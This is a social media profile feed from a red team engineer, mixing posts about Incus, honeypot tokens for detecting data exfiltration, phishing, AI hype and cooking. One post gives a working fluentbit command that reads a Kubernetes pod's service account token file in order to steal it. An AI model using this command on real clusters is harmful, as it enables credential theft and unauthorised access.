Graham Helton (too much for zblock)
@GrahamHelton3
Followers
11K
Following
9K
Media
2K
Statuses
6K
senior red team engineer @snowflake | former grocery store bagger He/him :wq!
Halfway down a rabbithole
Joined September 2018
Big fan of incus. I don't use 99% of the features proxmox offers.
Remember when I mentioned #Incus as an awesome alternative to #Proxmox? Well, #IncusOS is where that conversation just got a serious upgrade with… - ARM64 - Secure boot / TPM 2 - Immutable images - API driven #virtualization #container #linux #foss
https://t.co/p8dWzVz5Qp
0
0
2
My life was so much more organized before I started using symlinks.
0
0
6
I cant stress this enough: I dont care if malware was "vibe coded" or "uses ai". I have yet to see a story about this that was interesting
1
0
12
If i dont want to get caught the mere mention of a honeypot is enough to make me second guess every decision I make. Also setting honeypots in silly but effective places is an art. I have so many ideas to make my life terrifying during an assessment https://t.co/3huleD4Xzt
A few jobs ago we wanted to detect database exfiltration. So we added honeypot tokens (a uuid) every few rows. Set our DLP tools to alert if it saw that token being sent in the browser/slack/gdrive/email etc. I never concluded if it was a good idea. Some controls you can’t
0
4
34
Wise words from reddit: "The email URL redirects to the [real company] website so it's legit."
0
0
5
Oh my god S tier comment
@FFmpeg @InsiderPhD Just remember ALL CAPS when you spell the volunteers name
0
0
5
Friendly reminder you often don't need shells or standard unix utils to read files in kubenretes pods and steal service account tokens. fluentbit: /proc/1/exe -i head -p file=/var/run/secrets/kubernetes.io/serviceaccount/token -p buf_size=1000000 -o stdout -m '*' -q -f 1 2>&1
1
1
20
Wait do yall actually use the "for you" tab?
1
0
8
How am I supposed to work in these conditions
3
0
27
🤩🤩🤩 Wow YOURE absolutely right! 💯💯💯 ⚠️ CRITICAL 👀 THOUGHT LEADERSHIP 👇🤝 T̶̗͋H̴̳̎È̶͉ ̷̹̾V̴͖̉Ō̸̘Ị̷̂Ď̸̥ ̴̙̀C̶̹͘O̵̡͐N̸̰̉Ș̶̌U̴̔͜M̴̪͗E̴̠͘S̴̮̆ ̷̍ͅA̸̦̓L̷͇̍L̸̜͛ 🙊🙊
🚨⚔️🛡️ ATT&CK glow-up alert 🛡️⚔️🚨 Since its first release, ATT&CK has paired up adversary behaviors 🥷 with defensive advice 🛡️🤝. Our Detections have leveled up 📈🔎 over time—more details 📋, analytic pseudocode 💻🧠, and links to Data Sources 🔗🗄️.
2
1
14
I bought some cilantro from a local farmer's market and it came with a traveler
2
0
6
I will never understand people who say a phone camera is just as good as actual cameras.
2
0
4
First time making ravioli from scratch and it didn't completely fall apart so ill take that as a win
2
0
10